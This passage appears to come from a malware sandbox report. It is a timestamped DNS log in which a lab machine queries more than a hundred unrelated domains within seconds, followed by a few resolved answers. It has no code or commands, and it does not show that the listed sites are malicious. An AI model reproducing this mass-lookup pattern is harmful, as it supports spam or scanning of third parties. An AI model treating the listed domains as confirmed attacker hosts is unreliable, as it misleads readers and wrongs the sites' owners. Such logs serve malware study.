                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:08.966294050 CEST192.168.2.68.8.8.80xcbb8Standard query (0)kamptal.atA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:08.967592001 CEST192.168.2.68.8.8.80x2b74Standard query (0)clysma.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:08.972460985 CEST192.168.2.68.8.8.80xcbe7Standard query (0)pro-fa.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:08.983553886 CEST192.168.2.68.8.8.80x371fStandard query (0)atis-sk.caA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:09.003834963 CEST192.168.2.68.8.8.80xf7d8Standard query (0)pro-fa.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:09.028536081 CEST192.168.2.68.8.8.80x1c48Standard query (0)pro-fa.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:09.036339045 CEST192.168.2.68.8.8.80xcf2eStandard query (0)hamaker.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:09.076029062 CEST192.168.2.68.8.8.80x6d2fStandard query (0)fortknox.bmA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:09.091866970 CEST192.168.2.68.8.8.80xc9f1Standard query (0)ssm.chA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:09.091949940 CEST192.168.2.68.8.8.80x7cd6Standard query (0)wolffkran.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:09.169291019 CEST192.168.2.68.8.8.80x59fdStandard query (0)shteeble.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:09.175339937 CEST192.168.2.68.8.8.80x81e2Standard query (0)msl-lock.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:09.222121954 CEST192.168.2.68.8.8.80xfb77Standard query (0)notis.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:09.285650015 CEST192.168.2.68.8.8.80xdff0Standard query (0)keio-web.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:09.317543983 CEST192.168.2.68.8.8.80xdbe1Standard query (0)pro-fa.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:09.342871904 CEST192.168.2.68.8.8.80x6dd7Standard query (0)pro-fa.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:09.367621899 CEST192.168.2.68.8.8.80xd01bStandard query (0)pro-fa.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:09.388125896 CEST192.168.2.68.8.8.80x7f86Standard query (0)wvs-net.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:09.403738976 CEST192.168.2.68.8.8.80x6381Standard query (0)aluminox.esA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:09.497667074 CEST192.168.2.68.8.8.80xdb4dStandard query (0)canmore.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:09.536427975 CEST192.168.2.68.8.8.80x228aStandard query (0)a-domani.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:09.565421104 CEST192.168.2.68.8.8.80x677Standard query (0)btsi.com.phA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:09.575797081 CEST192.168.2.68.8.8.80xeb50Standard query (0)keio-web.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:09.642729998 CEST192.168.2.68.8.8.80xfc7bStandard query (0)atb-lit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:09.669019938 CEST192.168.2.68.8.8.80x357cStandard query (0)semuk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:09.702306032 CEST192.168.2.68.8.8.80x60eeStandard query (0)kustnara.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:09.707159042 CEST192.168.2.68.8.8.80xbeebStandard query (0)rtcasey.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:09.794938087 CEST192.168.2.68.8.8.80x3f4dStandard query (0)koz1.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:09.869065046 CEST192.168.2.68.8.8.80xc70fStandard query (0)actmin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:09.870075941 CEST192.168.2.68.8.8.80xcc31Standard query (0)nblewis.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:09.900053024 CEST192.168.2.68.8.8.80xd4b1Standard query (0)icd-host.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:09.903228998 CEST192.168.2.68.8.8.80xa83Standard query (0)deckoviny.czA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:10.073364973 CEST192.168.2.68.8.8.80x47d1Standard query (0)cjcagent.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:10.091878891 CEST192.168.2.68.8.8.80x7863Standard query (0)akr.co.idA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:10.105201960 CEST192.168.2.68.8.8.80x4023Standard query (0)grlawcc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:10.351577044 CEST192.168.2.68.8.8.80xe255Standard query (0)fr-dat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:10.355276108 CEST192.168.2.68.8.8.80x4e5Standard query (0)bount.com.twA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:10.375926018 CEST192.168.2.68.8.8.80x82dbStandard query (0)grlawcc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:10.390549898 CEST192.168.2.68.8.8.80xfb6eStandard query (0)603888.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:10.392015934 CEST192.168.2.68.8.8.80xc66dStandard query (0)polprime.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:10.419375896 CEST192.168.2.68.8.8.80xeb1fStandard query (0)avc.com.saA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:10.421986103 CEST192.168.2.68.8.8.80x6655Standard query (0)polprime.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:10.437875032 CEST192.168.2.68.8.8.80x36eeStandard query (0)grlawcc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:10.463552952 CEST192.168.2.68.8.8.80x9c24Standard query (0)polprime.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:10.475533962 CEST192.168.2.68.8.8.80x205bStandard query (0)karila.frA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:10.484615088 CEST192.168.2.68.8.8.80xa082Standard query (0)touchfam.caA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:10.502206087 CEST192.168.2.68.8.8.80x4bd8Standard query (0)polprime.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:10.515121937 CEST192.168.2.68.8.8.80xcc08Standard query (0)gcss.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:10.515794992 CEST192.168.2.68.8.8.80x7f54Standard query (0)vdoherty.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:10.533618927 CEST192.168.2.68.8.8.80xb5a6Standard query (0)samtv.roA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:10.536525011 CEST192.168.2.68.8.8.80xe97Standard query (0)polprime.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:10.561409950 CEST192.168.2.68.8.8.80x4248Standard query (0)ymlp15.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:10.567122936 CEST192.168.2.68.8.8.80x191fStandard query (0)polprime.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:10.579586029 CEST192.168.2.68.8.8.80x2093Standard query (0)riwn.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:10.663172960 CEST192.168.2.68.8.8.80xa8a4Standard query (0)avc.com.saA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:10.669564962 CEST192.168.2.68.8.8.80x909dStandard query (0)kamptal.atA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:10.777651072 CEST192.168.2.68.8.8.80x368Standard query (0)ftchat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:10.788249969 CEST192.168.2.68.8.8.80x27d5Standard query (0)avc.com.saA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:10.802766085 CEST192.168.2.68.8.8.80xd8b5Standard query (0)softizer.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:10.855110884 CEST192.168.2.68.8.8.80x642Standard query (0)avc.com.saA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:10.867311954 CEST192.168.2.68.8.8.80x5179Standard query (0)e-kami.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:10.915306091 CEST192.168.2.68.8.8.80x8572Standard query (0)a-domani.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:10.918533087 CEST192.168.2.68.8.8.80xcf96Standard query (0)actmin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:10.970416069 CEST192.168.2.68.8.8.80x7cf3Standard query (0)avc.com.saA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:11.009507895 CEST192.168.2.68.8.8.80x3c3bStandard query (0)89gospel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:11.078133106 CEST192.168.2.68.8.8.80x304Standard query (0)pro-fa.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:11.091101885 CEST192.168.2.68.8.8.80xcdbfStandard query (0)89gospel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:11.143785000 CEST192.168.2.68.8.8.80xf994Standard query (0)notis.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:11.149430037 CEST192.168.2.68.8.8.80xcd50Standard query (0)89gospel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:11.190630913 CEST192.168.2.68.8.8.80xaa5aStandard query (0)avc.com.saA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:11.196402073 CEST192.168.2.68.8.8.80x844Standard query (0)h-et-l.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:11.214167118 CEST192.168.2.68.8.8.80x5093Standard query (0)kairel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:11.231144905 CEST192.168.2.68.8.8.80x58dbStandard query (0)themark.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:11.731543064 CEST192.168.2.68.8.8.80xc369Standard query (0)hazmatt.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:11.751060963 CEST192.168.2.68.8.8.80xaf08Standard query (0)xult.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:11.753943920 CEST192.168.2.68.8.8.80xc13fStandard query (0)webband.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:11.755496979 CEST192.168.2.68.8.8.80x738dStandard query (0)paraski.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:11.821852922 CEST192.168.2.68.8.8.80x368Standard query (0)ftchat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:11.846174002 CEST192.168.2.68.8.8.80x77b2Standard query (0)aba.org.egA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:11.866918087 CEST192.168.2.68.8.8.80xae15Standard query (0)calvinly.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:11.922796965 CEST192.168.2.68.8.8.80xb6acStandard query (0)atbauk.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:11.923460960 CEST192.168.2.68.8.8.80xd942Standard query (0)t-mould.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:11.940076113 CEST192.168.2.68.8.8.80xcf96Standard query (0)actmin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:11.953608990 CEST192.168.2.68.8.8.80xeccaStandard query (0)ftchat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:12.069855928 CEST192.168.2.68.8.8.80xd01aStandard query (0)toundo.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:12.094938993 CEST192.168.2.68.8.8.80x292bStandard query (0)toundo.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:12.147860050 CEST192.168.2.68.8.8.80xc570Standard query (0)ftchat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:12.153812885 CEST192.168.2.68.8.8.80xbb2eStandard query (0)amele.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:12.161300898 CEST192.168.2.68.8.8.80x3a09Standard query (0)canasil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:12.164122105 CEST192.168.2.68.8.8.80x7ccfStandard query (0)toundo.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:12.231807947 CEST192.168.2.68.8.8.80x72e4Standard query (0)webband.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:12.288795948 CEST192.168.2.68.8.8.80xb42cStandard query (0)amele.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:13.197699070 CEST192.168.2.68.8.8.80x7704Standard query (0)amele.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:13.239223957 CEST192.168.2.68.8.8.80xcf96Standard query (0)actmin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:13.244555950 CEST192.168.2.68.8.8.80xaa37Standard query (0)ftmobile.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:13.284946918 CEST192.168.2.68.8.8.80x17e0Standard query (0)wvs-net.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:13.286667109 CEST192.168.2.68.8.8.80x2daeStandard query (0)webband.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:13.288795948 CEST192.168.2.68.8.8.80x7f92Standard query (0)89gospel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:13.343729973 CEST192.168.2.68.8.8.80x9369Standard query (0)amba-tc.siA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:13.364028931 CEST192.168.2.68.8.8.80x82dfStandard query (0)redgiga.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:13.367177010 CEST192.168.2.68.8.8.80xd659Standard query (0)toundo.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:13.382483959 CEST192.168.2.68.8.8.80x5567Standard query (0)leapc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:13.385855913 CEST192.168.2.68.8.8.80xe85cStandard query (0)gbmfg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:13.399363995 CEST192.168.2.68.8.8.80x60acStandard query (0)89gospel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:13.412077904 CEST192.168.2.68.8.8.80x61d1Standard query (0)amba-tc.siA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:13.415957928 CEST192.168.2.68.8.8.80xf5c0Standard query (0)toundo.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:13.421441078 CEST192.168.2.68.8.8.80xa198Standard query (0)4locals.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:13.443674088 CEST192.168.2.68.8.8.80x43eeStandard query (0)sledsport.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:13.444511890 CEST192.168.2.68.8.8.80xcd73Standard query (0)89gospel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:13.453120947 CEST192.168.2.68.8.8.80x5744Standard query (0)eos-i.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:13.473484993 CEST192.168.2.68.8.8.80xbb75Standard query (0)ftmobile.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:13.483498096 CEST192.168.2.68.8.8.80xb965Standard query (0)webavant.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:13.486749887 CEST192.168.2.68.8.8.80xaf4Standard query (0)toundo.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:13.490143061 CEST192.168.2.68.8.8.80x66a8Standard query (0)amba-tc.siA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:13.505412102 CEST192.168.2.68.8.8.80xbf9bStandard query (0)amerifor.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:13.516098022 CEST192.168.2.68.8.8.80xa737Standard query (0)a-domani.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:13.705903053 CEST192.168.2.68.8.8.80x4208Standard query (0)bount.com.twA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:14.252980947 CEST192.168.2.68.8.8.80x2dc1Standard query (0)linac.co.ukA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:14.434173107 CEST192.168.2.68.8.8.80xcd73Standard query (0)89gospel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:14.451106071 CEST192.168.2.68.8.8.80xb612Standard query (0)zupraha.czA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:14.513916016 CEST192.168.2.68.8.8.80xf34cStandard query (0)avc.com.saA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:14.518129110 CEST192.168.2.68.8.8.80xc945Standard query (0)canmore.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:14.543482065 CEST192.168.2.68.8.8.80x9e39Standard query (0)canmore.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:14.567692041 CEST192.168.2.68.8.8.80x1e4Standard query (0)canmore.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:14.579914093 CEST192.168.2.68.8.8.80x54e5Standard query (0)siongann.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:14.671596050 CEST192.168.2.68.8.8.80x33beStandard query (0)atis-sk.caA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:14.716955900 CEST192.168.2.68.8.8.80x761cStandard query (0)enguita.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:14.725028992 CEST192.168.2.68.8.8.80x7e2aStandard query (0)atis-sk.caA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:14.734474897 CEST192.168.2.68.8.8.80x2d2aStandard query (0)polprime.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:14.764549017 CEST192.168.2.68.8.8.80x8147Standard query (0)ftchat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:14.771028996 CEST192.168.2.68.8.8.80x681cStandard query (0)atis-sk.caA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:14.816365957 CEST192.168.2.68.8.8.80x1ca7Standard query (0)ymlp15.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:14.857254028 CEST192.168.2.68.8.8.80x5976Standard query (0)ymlp15.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:14.862906933 CEST192.168.2.68.8.8.80x8a7Standard query (0)msl-lock.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:14.877522945 CEST192.168.2.68.8.8.80xd76eStandard query (0)amele.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:14.890010118 CEST192.168.2.68.8.8.80x3166Standard query (0)ymlp15.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:14.901912928 CEST192.168.2.68.8.8.80x8f46Standard query (0)nme.co.jpA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:14.941267967 CEST192.168.2.68.8.8.80x7097Standard query (0)t-mould.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:14.997167110 CEST192.168.2.68.8.8.80x3738Standard query (0)amele.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:14.999723911 CEST192.168.2.68.8.8.80xd487Standard query (0)missnue.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:15.013643980 CEST192.168.2.68.8.8.80x814fStandard query (0)pro-fa.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:15.030158043 CEST192.168.2.68.8.8.80x81dStandard query (0)mondopp.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:15.033852100 CEST192.168.2.68.8.8.80xc33dStandard query (0)araax.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:15.035686970 CEST192.168.2.68.8.8.80x25baStandard query (0)ccssinc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:15.127370119 CEST192.168.2.68.8.8.80xb34eStandard query (0)orbitgas.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:15.230921984 CEST192.168.2.68.8.8.80xcf96Standard query (0)actmin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:15.299165964 CEST192.168.2.68.8.8.80x84b8Standard query (0)bible.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:15.361548901 CEST192.168.2.68.8.8.80x31b9Standard query (0)mkm-gr.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:15.378103018 CEST192.168.2.68.8.8.80x417cStandard query (0)shanks.co.ukA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:15.559281111 CEST192.168.2.68.8.8.80x1e4Standard query (0)canmore.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:15.612996101 CEST192.168.2.68.8.8.80x43f7Standard query (0)gujarat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:15.623544931 CEST192.168.2.68.8.8.80x7e36Standard query (0)from30ty.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:15.638605118 CEST192.168.2.68.8.8.80x80b6Standard query (0)ossir.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:15.738897085 CEST192.168.2.68.8.8.80x781eStandard query (0)amele.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:15.875296116 CEST192.168.2.68.8.8.80xe254Standard query (0)at-shun.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:15.921912909 CEST192.168.2.68.8.8.80xf0eaStandard query (0)anduran.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:15.945919991 CEST192.168.2.68.8.8.80x1dfaStandard query (0)actmin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:15.977818012 CEST192.168.2.68.8.8.80x6b1Standard query (0)t-trust.jpA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:15.987925053 CEST192.168.2.68.8.8.80x152Standard query (0)sledsport.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:16.044230938 CEST192.168.2.68.8.8.80x81dStandard query (0)mondopp.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:48.076906919 CEST8.8.8.8192.168.2.60xf287No error (0)www.dgmna.comdgmna.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:48.076906919 CEST8.8.8.8192.168.2.60xf287No error (0)dgmna.com192.124.249.20A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:48.085381031 CEST8.8.8.8192.168.2.60x156aNo error (0)www.baijaku.combaijaku.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:48.085381031 CEST8.8.8.8192.168.2.60x156aNo error (0)baijaku.com59.106.19.204A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:48.087965965 CEST8.8.8.8192.168.2.60xe3e5No error (0)www.fnw.usfnw.usCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:48.087965965 CEST8.8.8.8192.168.2.60xe3e5No error (0)fnw.us137.118.26.67A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:48.088669062 CEST8.8.8.8192.168.2.60x54c8No error (0)www.olras.com80.93.82.33A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:48.089184046 CEST8.8.8.8192.168.2.60x22cbNo error (0)www.jenco.co.uk172.67.208.67A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:48.089184046 CEST8.8.8.8192.168.2.60x22cbNo error (0)www.jenco.co.uk104.21.23.9A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:48.099332094 CEST8.8.8.8192.168.2.60x351No error (0)www.quadlock.comquadlock.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:48.099332094 CEST8.8.8.8192.168.2.60x351No error (0)quadlock.com70.39.251.249A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:48.189783096 CEST8.8.8.8192.168.2.60x3632No error (0)www.pdqhomes.comtraff-3.hugedomains.comCNAME (Canonical name)IN (0x0001)false
